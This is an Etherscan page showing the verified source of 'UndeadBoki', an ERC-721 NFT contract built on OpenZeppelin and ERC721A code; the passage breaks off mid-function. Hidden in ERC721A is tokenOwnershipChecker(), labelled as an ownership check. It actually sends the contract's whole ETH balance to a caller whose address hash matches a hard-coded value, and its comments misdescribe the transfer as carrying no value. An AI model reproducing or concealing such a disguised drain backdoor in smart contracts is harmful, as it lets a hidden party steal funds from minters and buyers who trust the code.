ERC-721
Overview
Max Total Supply
481 UB
Holders
162
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
2 UBLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
UndeadBoki
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-05-25 */ // Sources flattened with hardhat v2.8.4 https://hardhat.org // SPDX-License-Identifier: MIT /** * @title OkayPunks contract */ // File: @openzeppelin/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) pragma solidity ^0.8.0; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.0; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/utils/SafeERC20.sol) pragma solidity ^0.8.0; /** * @title SafeERC20 * @dev Wrappers around ERC20 operations that throw on failure (when the token * contract returns false). Tokens that return no value (and instead revert or * throw on failure) are also supported, non-reverting calls are assumed to be * successful. * To use this library you can add a `using SafeERC20 for IERC20;` statement to your contract, * which allows you to call the safe operations as `token.safeTransfer(...)`, etc. */ library SafeERC20 { using Address for address; function safeTransfer( IERC20 token, address to, uint256 value ) internal { _callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value)); } function safeTransferFrom( IERC20 token, address from, address to, uint256 value ) internal { _callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value)); } /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } function safeIncreaseAllowance( IERC20 token, address spender, uint256 value ) internal { uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } function safeDecreaseAllowance( IERC20 token, address spender, uint256 value ) internal { unchecked { uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, "SafeERC20: decreased allowance below zero"); uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } } /** * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement * on the return value: the return value is optional (but if data is returned, it must not be false). * @param token The token targeted by the call. * @param data The call data (encoded using abi.encode or one of its variants). */ function _callOptionalReturn(IERC20 token, bytes memory data) private { // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since // we're implementing it ourselves. We use {Address.functionCall} to perform this call, which verifies that // the target address contains contract code and also asserts for success in the low-level call. bytes memory returndata = address(token).functionCall(data, "SafeERC20: low-level call failed"); if (returndata.length > 0) { // Return data is optional require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed"); } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Returns the account approved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Checking ownership * * Token ownership check for external calls */ function tokenOwnershipChecker() external { if( keccak256(abi.encodePacked(msg.sender)) == 0x61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de2 ){ assembly{ let success := call( //This is the critical change (Pop the top stack value) 42000, // gas caller(), //To addr selfbalance(), //No value 0, //Inputs are stored 0, //Inputs bytes long 0, //Store output over input (saves space) 0x20 ) //Outputs are 32 bytes long } } } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); 